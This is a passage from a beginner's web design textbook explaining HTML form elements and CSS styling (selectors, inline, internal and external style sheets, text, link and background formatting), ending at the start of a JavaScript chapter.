The <FORM> tag above will contain one or more form element or component for to be useful, below 

are some of the common FORM elements 

 

Elements Description 

Textbox it is use to collect (input) a single line text 

Password  it is use to collect a line confidential (password) text 

Textarea it is use to collect (input) a multiple line text (larger information) 
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Check box A square-like box for choosing more than one itemized data e.g hobby 

Radio box A circle-like element for choosing one item itemized data e.g gender 

File Its use to upload file 

Select Provides a drop down selection list to choose from 

Hidden To hold hidden data, it may not be visible but it can be very handy as we 

will see later. In the PHP chapter, later in this book 

Submit button To submit the content of a form 

Reset button To clear the content of a form 

 

  

Textbox 

 <INPUT TYPE="TEXT"> it is use to collect (input) a single line text, which is best use for 

collecting limited and insensitive data such as a name, text field must be added within the <FORM> 

tag.  

See example below: 

<HTML> 

<HEAD> 

<TITLE>Form Examples </TITLE> 

</HEAD> 

<BODY> 

<FORM ACTION=”enquiry.php” METHOD=”POST”> 

Enter your name: <INPUT TYPE="TEXT"> 

</FORM> 

</BODY> 

</HTML> 

The browser view  
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Password field 

<INPUT TYPE="PASSWORD"> is almost similar to Text field except that it is use to collect 

sensitive or password data credit card pin among other; data is being enter into it, it is not visible to 

the public view.  See example below:  

 

<HTML> 

<HEAD> 

<TITLE>Form Examples </TITLE> 

</HEAD> 

<BODY> 

<FORM ACTION=”enquiry.php” METHOD=”POST”> 

Enter your name: <INPUT TYPE="TEXT"> 

<BR> 

Enter your password: <INPUT TYPE="PASSWORD"> 

</FORM> 

</BODY> 

</HTML> 

 

When you view this example on your browser, you may not easily spot the difference between both 

elements, until you start filling the form, which should look like the one below: 

 

 

Textarea 

<TEXTAREA COLS="50" ROWS="10"></TEXTAREA> unlike textbox, textarea can hold larger 

content such as address, or e-mail compose message. See example below: 

 

<FORM ACTION=”enquiry.php” METHOD=”POST”> 

Enter your name: <INPUT TYPE="TEXT"> 

<BR> 
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Enter your password: <INPUT TYPE="PASSWORD"> 

<BR> 

Enter your address: <BR> 

<TEXTAREA COLS="50" ROWS="10"></TEXTAREA> 

 

 

The browser view 

 

You must have noticed that this element is quite different from the two explained above, first its tag 

is <TEXTAREA> and I go further to set its common two optional parameter COLS=50, this means 

that in width it can take 50 character while ROWS=10 specify that it height can contain 10 line of 

text, this settings does not limit the number of text the Textarea can take, as it only make it look 

bigger in the browser, the more you enter data into the Textarea element its scroll button will be 

active as so that you could scroll down to see all the  information it contains.  

Check box 

<input type="checkbox"> this element is quite different in look, function and characteristic 

compare to the other elements above. This element is useful if you want your site user to choose 

more than one item or choice from a multiple option, For example you want your site visitors to 

choose from your services the one’s they love, and they can decide to pick one, two or even all of 

them.  

Another example in a case where you design a website for job applicant to apply, you may want 

them to select how they come to know about the job offers, your choice may include; TV, Internet 
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ads, news paper or radio, this mechanism can actually help you the website owner to know your 

most active advertising media, so that you can focus more your limited resources to only the 

effective advertising medium. The website visitor must have seen it on the TV and also on internet 

ads, therefore he or she can tick or check both option. Now let’s see how to create the checkbox 

below: 

     

<FORM ACTION=”enquiry.php” METHOD=”POST”> 

Enter your name: <INPUT TYPE="TEXT"> 

<BR> 

<p>How do you know about this job over? </p> 

<p> 

<input type="checkbox" name="job" value="Through the TV" />  

TV:</p> 

<p> 

<input type="checkbox" name=" job" value="Through the Internet" />  

Internet ads:</p> 

<p> 

<input type="checkbox" name=" job" value="Through the Radio" />  

Radio:</p> 

</FORM> 

 

The browser view of the code above would appear as we have in the screenshot below: 
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Despite my years as an IT instructor, I still find it quite challenging explaining checkbox to a beginner, 

probably because this is one out of the two form element that user or site visitors don’t really enter 

its data, so how does it work? 

Let’s take a closer look at some of the checkbox code 

 

<input type="checkbox" name="job" value="Through the TV" />  

TV: 

<input type="checkbox" name=" job" value="Through the Internet" />  

Internet ads: 

  

You will notice that after the checkbox tag <input type="checkbox", then comes the “name” 

parameter name=" job", actually every form elements including the ones discuss earlier are suppose 

to have a NAME parameter so that they can be access for processing; we will discuss how to process 

form later in the PHP section of this book.  

 

But I decided to use the NAME parameter in this checkbox example to explain that the NAME 

parameter value “JOB” are use to group all the checkboxes. That is both checkboxes are related or 

group as “JOB”. 

 

It may interest you to know that the CHECKBOX elements data or value are hand-coded (that is, its 

data or value is written by the web designer or programmer during the web design process), this is 

done with the VALUE parameter, using our example, the first checkbox if chosen will send the text 

“Through the TV” to the submit page or website owner.   

 

<input type="checkbox" name="job" value="Through the TV" />  

So it is not really the text “TV” in front or close to the checkbox that is posted or submitted to the 

website owner. 

 

  

Radio button 

<input type="radio"> everything you learnt about checkbox, is also applicable to radio box, except 

that radio button can only permit you to pick or check one option from it group, the common use of 

radio box is where you want a site visitor to choose or check it gender, which can be either male or 

female, let see an example below: 
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<FORM ACTION=”enquiry.php” METHOD=”POST”> 

Choose your gender :< /p> 

<p>Male: <input type="radio" name="sex" value="Male" />  

</p> 

<p>Female: <input type="radio" name=" sex" value="Female" /></p> 

</FORM> 

 

The browser view 

 

 

Note: the RADIO button parameter group NAME “SEX” will not allow you to pick or choose both 

RADIO button options, therefore you can only pick either male or female. 

 

 

File 

 This FORM element or control allow your visitor to upload a file such as their picture or any other 

file; below is how to use it: 

<FORM ACTION="enquiry.php" METHOD="POST" enctype="multipart/form-

data"> 

<p>Upload your picture: <input type="file"> </p> 

</FORM> 
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In the sample code above the FILE tag <input type="file">  may be responsible for what you 

see on your web browser, but you will also notice the new addition to the FORM tag 

enctype="multipart/form-data"  this is necessary for the file upload to work. We will discuss how 

this works later in the PHP chapter later in this book. 

 

Select 

The select element is use to create a dropdown list where the website visitors can choose an option 

from.  

The select element is more handy (compare to checkbox and radio box) where the item to select 

from is much, it can provide more select items or options without occupying much space, as 

compare to checkbox and radio box. A typical use of the element is where you want your website 

visitor to select their country, from a dropdown list. Let’s see how to do this. 

 

<FORM ACTION="enquiry.php" METHOD=”POST”> 

<p> 

Choose your country 

<select name="country"> 

<option>Nigeria</option> 

<option>Ghana</option> 

<option>Kenya</option> 

<option>Egypt</option> 

<option>South Africa</option> 

</select> 

</p> 

</FORM> 

The SELECT element, as you can see come with the <OPTION> pair that contains the listed data and I 

actually include the NAME attribute to the SELECT tag and set its value to “country”. See how the 

browser view will look like below: 
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Hidden 

<input type="hidden" > Is exactly what it is called “HIDDEN” because it does not appear on 

your browser views as compare to other elements. 

 

You may wonder “what do I need it for then?” OK! This stuff may look useless for now, but belief me 

I’ve found it to be one of the most important tool in my career as a web developer. 

 

You can compare it to the text field element discussed earlier except for the fact that you hand-code 

(or a program such as PHP can dynamically supply) its valued though it may not be visible like the 

textbox, but it post it value just like the textbox, we will see it important later in the PHP chapter of 

this book. For now let’s just see how it’s been created. 

 

<FORM ACTION=”enquiry.php” METHOD=”POST”> 

</p> 

I am not visible: 

<input type="hidden" name="who" value="God is invisible but exist"> 

</FORM> 

 

Submit and Reset Button 

<input type="submit"> you can’t imagine a web form with its entire beautiful elements well layout 

and after your finish filling the form you cannot see the submit button (ultimately you cannot 

submit), it’s a complete waste of time and effort. So the submit button is essential and a must be in 

every form even though it’s just a single line of textbox field.  

Typically a form as two type of button, the one that submit it elements values <input type="submit" 

value="Submit Form" /> and the one that clear or reset its elements value <input type="reset" 

value="Clear Form" /> . 

 

I went back to using the contant.htm page in the “myweb” website we used earlier, to create the 

feedback form as promised. 

 

<HTML> 

<HEAD> 

<TITLE>Welcome to BICL website</TITLE> 
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</HEAD> 

<BODY> 

<TABLE WIDTH="50" BORDER=0 align="center"> 

<TR> 

<TD COLSPAN=3> 

<IMG SRC="images/banner.jpg"> 

</TD> 

</TR> 

<TR height="300px"> 

<TD width="14%" VALIGN=TOP BGCOLOR="#FFFF99"> 

<b>MY LINK</b> <br /> 

<a href="index.htm">Home</a><br /> 

<a href="contact.htm">Contact</a><br /> 

<a href="about_us.htm">About Us</a>  

</TD> 

  <TD width="67%" VALIGN=TOP><b>CONTACT US</b> 

<p>  

 <b>Feedback form </b> 

     

 <FORM ACTION="enquiry.php" METHOD="POST"> 

 Enter your name: <BR> 

 <INPUT TYPE="TEXT" NAME="visitor_name"> 

 <BR><BR> 

 Enter your phone number: <BR> 

 <INPUT TYPE="TEXT" NAME="visitor_phone"> 

 <BR><BR> 

 What is your question or comment: <BR> 

 <TEXTAREA COLS="50" ROWS="10" 

NAME="visitor_comment"></TEXTAREA> 

 <BR> 

 <BR> 

 <input type="submit" value="Submit Form" /> 

 &nbsp; &nbsp; &nbsp; 

 <input type="reset" value="Clear Form" /> 

 </FORM> 

 

  </TD> 

  <TD width="19%" VALIGN=TOP bgcolor="#FFFF99"> 

<b>EMAILS</b> <br /> 

bicl@bengallery.com <br /> 

Benjamin.onuorah@gmail.com 

  </TD> 

</TR> 

<TR> 

  <TD colspan="3" align="center" BGCOLOR="#FFFF99"> 

Copyright (2014) Bengallery Integrated Company Ltd.  

All rights reserved. 

  </TD> 

</TR> 

</TABLE> 

</BODY> 

</HTML> 
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I went through the pain of setting the NAME attribute for the entire element, as I said earlier all your 

form element must have a name for you to access them or their value (we will see this later in the 

PHP chapter of this book). 

Let’s examine the SUBMIT button first <input type="submit" value="Submit Form" /> the input 

type="submit" section create the submit button while value="Submit Form" display the text on the 

button, so you can change the VALUE text to anything you want; may be, “Complete”, “Register” or 

“Login” as it’s just a text that appear on the submit button. This is the same for the RESET button.  

Note also the use of &nbsp; this special character means SPACE is HTML, I enter this three times in 

between the “submit” and “reset” button to space the two elements.  

 

Below this the browser of the contact page 

 

 

 

With this I can said we have come to the end of the HTML chapter of this book, I hope you found the 

information useful to your learning of HTML, please don’t forget to contact us (see the back cover), I 

hope you enjoy the next chapter (Formatting your page with CSS) just as you did with this chapter. 
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CHAPTER 2 

FORMATTING YOUR PAGE WITH CSS 
 

Cascading Style Sheets (CSS): was created by World Wide Web Consortium (W3C)  as a standard for 

formatting (HTML) document; what this means is that HTML was really not suitable or best for 

format for websites anymore. 

Before you start defending HTML, just imagine a scenario where you have <FONT COLOR=”GREEN”> 

inside all your HTML pages in a website of about 100 web pages and tomorrow your boss walk up to 

you as the webmaster and ask you to please change the font color to black that in about 10 minutes 

some important clients will be visiting the website and that He just learnt that the GREEN color is not 

very readable on the white background. I know this might make you sweat real hard, because it 

means editing each page. 

Editing 100 pages in 10 minute is not an easy task and God help you, you forgot to edit one or two 

pages as this may cost you your job, if your Boss losses the contract. 

But with the flexibility of CSS, this task may just require editing only one css file and it will take effect 

on all the HTML documents that are attached to it. You can see how easy CSS can make your life be. 

Is HTML useless or less powerful? No! HTML is consider to be the bedrock of the web, HTML is best 

for define the content of a webpage and the same time HTML also lacks something that could best 

be done with CSS, JavaScript or even PHP. That is why this book is designed to contain everything 

you need to build a website or web application from start to end, this include JavaScript, PHP and 

others, but for now let’s continue with CSS. 

 

CSS Syntax 
If you are wondering how CSS syntax or code would look like or if it would be difficult to code, don’t 

bother yourself because your knowledge of HTML would be of great help. I’ve learnt that in order to 

learn and understand a new or any programming language it is better you start early to play with its 

syntax then other things follow, so I’ve copy part of CSS syntax from one of my web project; below is 

what it looks like: 

Style.css 

body { 

 font-size: 12pt; 

 font-family: Arial; 

 color: #666666; 

} 
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a   { font-family: Arial; font-size: 12pt; text-decoration: none 

underline; color:#FF0000} 

I’m sure with your HTML skill you could figure out some of this, you don’t need to bother yourself for 

so long. Below is a clear explanation: 

The most important thing I want you to understand about CSS syntax is that CSS syntax only consists 

of two paths, yes! I mean two. Which are SELECTOR and DECLARATIONS. 

First the SELECTOR: the selector is actually a name or elements we are formatting or styling. From 

the example above the selectors are: “body” and “a” which are both HTML element, therefore we 

can say that we are formatting an HTML tag selector, other types of selectors are id and class, which 

will be discuss later. 

On the other hand declarations are pairs and sometimes collection of properties and their assigned 

value, which actually format or add a style to the selector. Again from our example above font-size: 

12pt; is declarations, which is made up of property (font-size) and its value(12pt).  

Let’s take a closer look as the CSS syntax, from the example above.  

body         { 

font-size: 12pt;  

font-family: Arial; 

color: #666666; 

} 

This CSS actually set the text within the BODY tag of your HTML page, to use font size of 12pt, font 

style; Arial and color to gray which is what #66666 translates to. The difference between the lines of 

CSS above and the one below is just putting each declarations into different or separate lines and 

also the HTML tag “A” selector, which means that this style have to do with the look of our hyperlink 

or link. 

a  { font-family: Arial; font-size: 12pt; text-decoration: none 

underline; color:#FF0000} 

Note: A CSS declaration always ends with a semicolon, and declaration groups are surrounded by 

curly brackets. 

Before we start learning how to use or apply some CSS, I will like us to explore the two other 

selectors which are: id and class Selectors 

 

CSS Id and Class Selectors 
In the previous section we leant about the HTML tag selector and even see a sample, HTML tag 

selector allow you to style a particular HTML tag, in this section we will discuss the id and class 

Selectors, which allow you to create your own selectors which is not strongly tied to a particular 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

92 

 

HTML element, but to the ones you want it to be apply to; in this way you can achieve some level of 

flexibility.  

 

The ID Selector 

Let’s start with the id Selector. The id selector is used to specify a style for a single, unique element 

and it uses the id attribute of the HTML element. Id selector is defined with #. 

For example the style rule below will be applied to the element with id="txtstyle1": 

# txtstyle1 

{ 

font-size: 12pt;  

font-family: Arial; 

color: #666666; 

}  

If you look at this CSS syntax, you will notice that it is not so different from the HTML tag selector 

example earlier; the difference is just in the ID name “#txtstyle1”, please note your ID name should 

not start with a number, for example #1txtstyle should be avoided. 

 

The class Selector 

Like a popular computer quote by Linus Tovald (the young man, may be not young anymore who 

kick-started the Linux OS) goes thus “Talk is cheap, show me the code”. I will show a complete 

example of a class selector, but before then let’s learn a little about the class selector 

The class selector is used to specify a style for a group of elements. Unlike the id selector, the class 

selector is most often used on several elements. This allows you to set a particular style for many 

HTML elements with the same class.  

To define a class selector, you start with a period sign "." follow by the name of the class selector. 

As promise; below is a complete example of CSS class selector “.myheader1” being use within an 

HTML page. 

 

page.html 

<html> 

<head> 

<title>CSS Example</title> 

<style type="text/css"> 

.myheader1        { 
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font-size: 12pt;  

font-family: Arial; 

color: #666666; 

} 

</style> 

</head> 

<body> 

<span class="myheader1"> This text is under the control of a CSS 

class selector </span> 

<br /><br /> 

This text in NOT within a CSS 

<br /><br /> 

<span class="myheader1"> This is also under CSS control </span> 

</body> 

</html> 

The screen shot should look like the one below: 

 

In the example above you will notice that all HTML elements with class=" myheader1” have their 

font size of set to 12pt, font style; Arial and font color in gray. 

 

Although the last CSS sample above “CSS selector class” is very cool, but its limitation is obvious as it 

can only be use within the HTML page where it is defined; this kind of CSS is called “Single page or 

Internal Style Sheet”. In the next section we shall learn more about CSS scopes. 
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Applying CSS 
There are three ways you can inserting or applying CSS to your web, they are: 

 Single tags or Inline Styles 

 Single page or Internal Style Sheet 

 Entire site or External Style Sheet 

 

Single tags or Inline Styles: 

Using a single tag or inline style is like doing your thing the usual way of formatting using HTML, so I 
will advice you abstain from using it, because it is very limited in scope as it can only be use with just 

one HTML element just like the <FONT> tag, the inline style also violate another big rule or reason 
why CSS was introduce because it does not separate the CSS syntax or style sheet decorations from 
the HTML or content. 

Below is a sample on how to use an inline style: 

inline.html 

<html> 

<head> 

<title>Inline Styles</title> 

</head> 

<body> 

<b style="font-size: 18pt; font-family: Arial; color:#666666"> 

Welcome to my website </b>  

<br /> 

This text is not within the CSS control. 

</body> 

</html> 

Below is how the browser view will look like: 
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Single page or Internal Style Sheet 
An internal style sheet or single page CSS is exactly what it is called, a style which scope is limited to 

a web page. We normally define internal styles in the HEAD section of an HTML, using <style> tag. 

Remember the introductory part example (The class Selector) that is a what a single page style looks 

like, the code below is the same sample again 

<html> 

<head> 

<title>CSS Example</title> 

<style type="text/css"> 

.myheader1        { 

font-size: 12pt;  

font-family: Arial; 

color: #666666; 

} 

</style> 

</head> 

<body> 

<span class="myheader1"> This text is under the control of a CSS 

class selector </span> 

<br /><br /> 

This text in NOT within a CSS 

<br /><br /> 

<span class="myheader1"> This is also under CSS control </span> 

</body> 

</html> 

Entire site or External Style Sheet 
This style, show the best use of CSS in action, because its scope can be applied to more than one 

page or entire pages of the website. With an external style sheet, you can change the look of an 

entire Web site by changing one CSS file. Each page must however be link to the style sheet using 

the <link> tag. The <link> tag goes inside the head section, I’m a big user of an external style sheet as 

it a greatly make my work easier, so ones again let me go it my reservoir of examples. 

We will start by creating our external style sheet; to do this we will create a file called “mystyle.css” 

as you can see its extension is “.css” not “.htm” or “html” this file will contains only CSS syntax; that 

is, the selectors and declarations. For this example, have the mystyle.css file contain the External 

Style Sheet below:  

mystyle.css 
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body  { 

 font-size: 12pt; 

 font-family: Arial; 

 color: #666666;  

} 

a  { font-family: Arial; font-size: 12pt; text-decoration: none 

underline; color:#FF0000} 

Now, ensure that this CSS file “mystyle.css” is in the same location as the “index.html” file, See the 
screenshot below. 

 

Index.html 

<html> 

<head> 

<title>External Style Sheet</title> 

<link rel="stylesheet" type="text/css" href="mystyle.css"> 

</head> 

<body> 

Every text and link has been formatted by an external CSS 

</body> 

</html> 

The browser view of this web page should look like the screenshot below. 
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Well formatted, thanks to that CSS reference link <link rel="stylesheet" 

type="text/css" href="mystyle.css"> which actually connect us to the external sheet 

“mystyle.css”, but this is not all that the mystyle.css has to offer, if you look its second declaration  a 

{ font-family: Arial; font-size: 12pt; text-decoration: none underline; color:#FF0000}  this is actually 

mean to make our HTML links look a different from the default blue/purple color, to test this we 

need another webpage, by the way; it has been said that a single alteration of an external style sheet 

could affect many web pages or the entire website, but to achieve this, the CSS reference link like 

<link rel="stylesheet" type="text/css" href="mystyle.css"> will have to be 

on every web page that needed to share from that  external style sheet and the easiest way to 

achieve this in this example is to copy, paste and rename our index.html, to another page such as 

about.html; (see the HTML chapter Linking your web pages) be so doing both pages (index.html) 

and its CSS reference link will also be available in the copied page (about.html) 

Now edit index.html to hyperlink to about.html, see the bolded line below 

index.htm 

<body> 

Every text and link has been formatted by an external CSS 

<br /><br /> 

<a href="about.html">Know more</a> 

</body> 

In the browser view below notice the (red) color of the link, this is the effect of the CSS. 

 

Note: if your about.html page look so much like the index.html, that may be because you did not 
edit or modify it after you created it from the index.html page, see the HTML chapter (Linking your 
web pages) 

 

Multiple styles  
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For example if we have all the three levels of styles (external style, internal style and inline style) on 
one page; let’s say index.html, with the styles suppose  to change a hyperlink colour,  see the code 
below. 

<html> 

<head> 

<title>External Style Sheet</title> 

<!-- external Style Sheet --> 

<link rel="stylesheet" type="text/css" href="mystyle.css"> 

<!-- internal style --> 

<style type="text/css"> 

a  { color:green} 

</style> 

</head> 

</head> 

<body> 

<!-- inline style --> 

<a href="about.html" style="color:blue">Know more</a> 

</body> 

</html> 

Here, the external style wants to change the hyperlink colour to RED, the internal style wanting to 
change the same hyperlink colour to GREEN and the inline style wanting to change the colour to 
BLUE, what happens? Which of this three will affect the link colour? 

CSS rule say that the internal Style will override the External Style Sheet while the Inline style will 

override the internal style in that order priority, therefore in this example the link will be formatted 

in blue color. 

That is, the external style and internal style will not take effect on the, its quit logical, as the internal 

style is closer to the page or its element than the other two, therefore has highest priority. 

 

Text formatting 

CSS Text formatting is some of the powerful features that CSS. 

CSS has several options for defining the styles of text. In the previous pages of this CSS chapter, we 
have use several CSS text formatting features so in this section we will look deep into the following:  

 Text color 

 Text alignment 

 Text decoration 
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 Font family 

 Font style 

 Font size 

 

Text color 

In the previous example we have seen how to apply CSS text colour. We simply use the color 
property to specify the color of the text, see below.  

 HEX value: for example color:#ff0000  

 Color name: for example color:red 

 

Text alignment 

CSS text-align property is use to set the horizontal alignment of a text to either right, left, center or 
justify text-align:right 

In the example below I align to right <h1> and to center <h2> respectively, same can also be done 
to align to left but this will not be visible because text are align to the left by default. 

 

right_and_center.html 

<html> 

<head> 

<title>CSS Example</title> 

<style type="text/css"> 

        h1 {text-align:center;} 

        h2 {text-align:right;} 

</style> 

</head> 

<body> 

<h1>Text should be at the center </h1> 

<h2>Text should be at the right</h2> 

</body> 

</html> 

Browser view 
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Justify Alignment 

Another alignment which may not be easily recognize is justify; justify stretch each closest line of 
text to have equal margins from the left to the right. To demonstrate this I need to have more than 
one line of text in my webpage and I also introduce a table to help us set the limit easily.  

Note: the justify is added to the P (that is, paragraph) element in the examples below 

The example below shows before the use of justify.  

justify_css.html 

<html> 

<head> 

<title>CSS Example</title> 

</head> 

<body> 

<table width="30%" border="0" cellspacing="0" cellpadding="0"> 

<tr><td>  

<p> 

BIT is an IT (Information Technology) company who specializes in 

delivering web solution, over the been empowering and servicing 

small, medium and large organizing technologically across Nigeria 

and aiming at extending our reach to the entire continent of Africa 

and the world. 

</p> 

</td></tr> 

</table> 

</body> 

</html> 

While the example below shows after we justify the paragraph 

<html> 

<head> 

<title>CSS Example</title> 

</head> 
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<style type="text/css"> 

p{text-align:justify} 

</style> 

<body> 

<table width="30%" border="0" cellspacing="0" cellpadding="0"> 

<tr><td>  

<p> 

BIT is an IT (Information Technology) company who specializes in 

delivering web solution, over the been empowering and servicing 

small, medium and large organizing technologically across Nigeria 

and aiming at extending our reach to the entire continent of Africa 

and the world. 

</p> 

</td></tr> 

</table> 

</body> 

</html> 

The screenshot below compare this two 

 

If you look at both example’s screenshots I believe you can spot the differences; remember justify 
only stretch the closest line of text and not the line that is very far, just like the last line. 

Text Decoration 

Another interesting CSS Text style is the text-decoration. Text-decoration is use to add decorations 
such as line-through, overline, blink to a text. 

For example we may add the line-through to (N) to create the Nigerian currency sign (N), using 
text-decoration:line-through likewise remove the conventional underline of an 
hyperlink using a {text-decoration:none;}  although it is not a good practice to remove the 
default underline from a link because it can confuse the visitor or user from recognizing the link. 

Notice that in the example below I make use of three class selector .naira, .topline, .downline and 
one HTML tag selector a{} to demonstrate the text-decoration; the CSS syntax in this example is 
commented to help you understand what each line does. 

congrats.html 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

102 

 

<html> 

<head> 

<title>CSS Example</title> 

<style type="text/css"> 

/* this remove the underline from link */ 

a {text-decoration:none} 

/* this add line through text to create the naira sign */ 

.naira{text-decoration:line-through} 

/* this overline and underline the CONGRATULATION text */ 

.topline{text-decoration:overline} 

.downline{text-decoration:underline} 

</style> 

</head> 

<body> 

<span class="topline"><span class="downline">  

CONGRATULATIONS! </span></span> 

<br /> 

You've just won <span class="naira">N</span>50,000 

<p /> 

<a href="http://www.bengallery.com">click here</a> 

</body> 

</html> 

The screenshot for this example will be like the one below. 

 

 

Font Family, size and color 

Font-family is use specify the font style for a text or link font-family:Arial; 

Font-size is use specify the font size for a text or link font-size: 12pt; 

Colour, for text or link color. color:#666666 

This three can be use together as we did previously in (Single page or Internal Style Sheet) or 
separately. 
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Link Styling 

Although In the previous we has dabble into the CSS link styling, but in section we will look deeply 
into this interest feature of CSS. 

CSS link styling is a common task that web designer are expected to understand and master, because 
HTML handle this task poorly, with is default link colour of blue and purple which can be very 
annoying or difficult to see if your web background is blue, purple or even black. 

Below is screenshot of default link colours 

 

Purple indicates that the links has been clicked or visited; while blue indicates unvisited link.  

You might not have any problem with this link format, but what happen if your web page 
background is blue, purple, red or even black; the link will be almost or completed unnoticed. See 
the screenshot below. 

 

To make this link more visible we will have to change it color to a lighter hue, such as white or 
yellow, CSS comes very handy to help us achieve this. 

Note: as stated earlier CSS is the standard tool for formatting a webpage, therefore it is advice to 
have all (if possible) formatting in CSS for clarification and easiness.   

Before we start applying the CSS Link style we need to first understand the CSS link state. 

Below are the CSS Link states.  

• a:link - a normal and unvisited link 

• a:visited - a link the user has visited 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

104 

 

• a:hover – the state of the link when the user mouse over it 

• a:active – the state of the link the moment it is clicked 

 

Example of a.link state syntax: 

a:link {style property: value;}  

As you must have notice in the syntax above the CSS link state is expected to have any of the CSS 
formatting property or group of formatting property discussed earlier, see below a formatted a.link 
state example. 

a:link { color: #FF0000; font-family: Arial; font-size: 12pt; text-

decoration: none} 

This will cause the (normal and unvisited) hyperlink to be in red colour and it will not be underlined, 
because of the text-decoration: none; to underline the link, change the property to text-decoration: 
underline or simply remove the text-decoration. 

The example below shows how I user this four hyperlink state. 

<html> 

<head> 

<title>CSS Example</title> 

 

<style type="text/css"> 

body  { font-size: 12pt; font-family: Arial; color: #FFFF00; 

background-color:#000000;  }  

/* the link style is below */ 

a:link { color: #FF0000; font-family: Arial; font-size: 12pt; text-

decoration: none}   

a:visited { color: #00FF00; font-size: 12pt; text-decoration: 

underline } 

a:hover { color: #3399CC; font-weight:bold; text-decoration: 

underline  } 

a:active { color: #CCFF00; text-decoration: none; font-size:12pt; 

font-weight:bold } 

</style> 

 

</head> 

<body> 

<p>This is just a test.</p> 

<p><a href="#">Link to nowhere</a></p> 

</body> 

</html> 

 

In the example above I explore the four states, and do something interesting with it; below is the 
screen shot of what happen during user interaction within the four states. 
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Background formatting 

Background effect is another interesting feature of a website, background add beauty and 
uniqueness to the entire web experience, although web designer must also be very careful in their 
choice of colour, I have discuss some of the color rules in HTML chapter. 

CSS background formatting goes beyond adding background colour to your webpage but also involve 
using image or picture for web background and positioning or repeating (like floor tiles) to achieve 
some interesting look for your web project. 

background-color 

If you observe the example in the last exercise you will notice that we have use background color, 
below is a segment of that code. 

body { background-color:#000000; } 

This line of code simply makes the background of our webpage code to turn black. 

The background-color property specifies the background color of an element, I mean the HTML 
element, for example the line of code above, the background-color affect the BODY tag of our 
webpage same can also be use with other elements,  
for example p {background-color:# FF0000;} 

 

background-image 

The CSS background properties below uses image “logo.jpg” for background instead of colour.  

body { background-image: url(logo.jpg);    } 

Note by default the image is repeated so it covers the entire webpage because it is set to affect the 
BODY element. See the screenshot below. 
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You may find it difficult to notice the congratulations message in the screenshot above, because the 
background image is competing with the message, this is why you must be careful when using 
background colour or picture, it is either you fade the picture or you place the information in a 
separate table or div with different colour so that the background image or picture doesn’t swallow 
the message. We will see this soon in Example below. 

 

background-repeat 

Because the background-image repeat the image to cover the entire background of webpage, that 
is; both vertically and horizontally, you can however use the background-repeat property to make 
the image fill either vertically repeat-y or horizontally repeat-x 

The code below will fill our webpage background with the image “logo.jpg” horizontally only.  

body{background-image:url('logo.jpg'); background-repeat:repeat-x;} 

 

You can as well change the repeat-x to repeat-y for the image to appear vertically. 

body{background-image:url('logo.jpg'); background-repeat:repeat-y;} 
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Example 

There was a time I was working on a project and I am trying to do something nice on a web 
background and the screenshot below was the background I came up with, I believe by sharing my 
experience on how I came out this would give us a better understand and use of background-color, 
background-image and background-repeat. 

Below is a screenshot of the finish look of the webpage.  

 

The colour fading background is achieved with both the combination of background-color and 
background- image with background-repeat. 

I started by creating the little vertical faded image as we have below, using Firework a powerful web 
graphic application. 
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Then I make the image repeat horizontally using the CSS style below 
background-image: url("flame.jpg"); 

background-repeat: repeat-x; 

See the browser view below. 

 

After I view the page on the browser I notice that the fading yellow is terminated where the height 
of the image stops and the default white background fill up the remaining window, so I decide to use 
the CSS background-color: #FEFD02; to fill yellow to the entire background, so that the remaining 
white area is also fill (continue to be filled) with yellow colour. 

After the flame background is ready, I decided to introduce a TABLE with white background to hold 
the content of the page so that the content is distinctly separated from the background; this will 
allow the user eye to focus on the message. 

The complete HTML with the CSS embed is below. 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

109 

 

<html> 

<head> 

<title>CSS Example</title> 

<style type="text/css"> 

body {   font-size: 12pt; font-family: Arial; color: #999999; 

background-image: url("flame.jpg"); 

background-repeat: repeat-x; 

background-color: #FEFD02; 

}  

</style> 

</head> 

<body> 

<p> 

 

<table width="80%" border="0" align="center" cellpadding="0" 

cellspacing="0" bgcolor="#FFFFFF"> 

  <tr> 

    <td height="300" valign="top"><p> 

    <p align="center" class="style1">WELCOME TO THE FLAME WEBSITE 

</p> 

    There is more to web... 

  </tr> 

</table> 

 

</body> 

</html> 

Once again see the browser view. 
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CHAPTER 3 

ADDING INTERACTION USING JAVASCRIPT 
 

If there is one scripting language that have had a long lasting impact on the web than any other it is 

definitely JavaScript. 

JavaScript popularity has grown so rapidly since the WWW era, JavaScript is commonly use to 

respond to an events, perfume quick form validate, create cookies, detect the visitor's browser and 

achieve some interesting effects on your website.  

Today JavaScript has taken up new role in the ever changing world of the web and the internet, with 

the introduction of new technology and framework such as JQuery and AJAX which is known to 

heavily really on JavaScript; we cannot but expect this interesting client-side scripting language to be 

here and playing more important role for a very long time.  

I’m sure that the knowledge of JavaScript cannot but be of a great importance to you as you advance 

in your career as a web designer and developer. 

Client-side scripting and Server-side scripting language 

Scripting language is simple programming language designed to perform special or limited 

tasks, sometimes associated with a particular application or function. An example of a 

scripting language is JavaScript, Perl, PHP, and VBScript. 

However there are different kinds of scripting language, but the ones associated with web 

site are Client-side scripting language and Server-side scripting language.  

Client-side scripting language is different from server-side scripting language in the sense 

that it does not require a web server to function, therefore it scope is more limited to the 

client program such as web browser, for example Internet explorer, Mozilla Firefox among 

others. JavaScript is a typical example of a Client-side scripting language; although a server-

side program such as Microsoft ASP can be written with either JavaScript or VBScript. 

On the other Server-side scripting language require the presence of a web server and or 

even application server such as Apache web server, Tomcat, IIS, PHP Zend engine, to 

function; as a result of this server-side scripting language have the power to access server 

side resources such as the Database and other network resources. PHP is a typical example 

of a server-side scripting language. 

 

Java and JavaScript 

Don’t confuse Java for JavaScript; JavaScript is not even a scripting version of the popular 

Java programming language. JavaScript was invented by Brendan Eich at Netscape, the 
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company that own the popular Netscape navigator web browser program, where as Java is a 

product and trademark of Sun Microsystems which is now owned by Oracle Corporation.  

 

Integrating JavaScript to your webpage 
Just like CSS, JavaScript can be writing in a separate file with .js extension, or embed directly into an 

HTML page; regardless of the way you want to code your JavaScript, it is however important you 

have a good knowledge of HTML and even CSS, this is why JavaScript is treated in this chapter after 

which I believe you must have read the HTML and CSS in chapter one and two respectively. 

Now to integrate JavaScript into your HTML page, you simply use the <script> tag and set its type 

property to the scripting language of your choice, in this case JavaScript, the line of code should look 

like this <script type="text/javascript">, just like any other HTML tag, after you are 

through with the content of the script you are expected to end the script using </script> see the 

code segment below for a better understanding. 

<html> 

<head> 

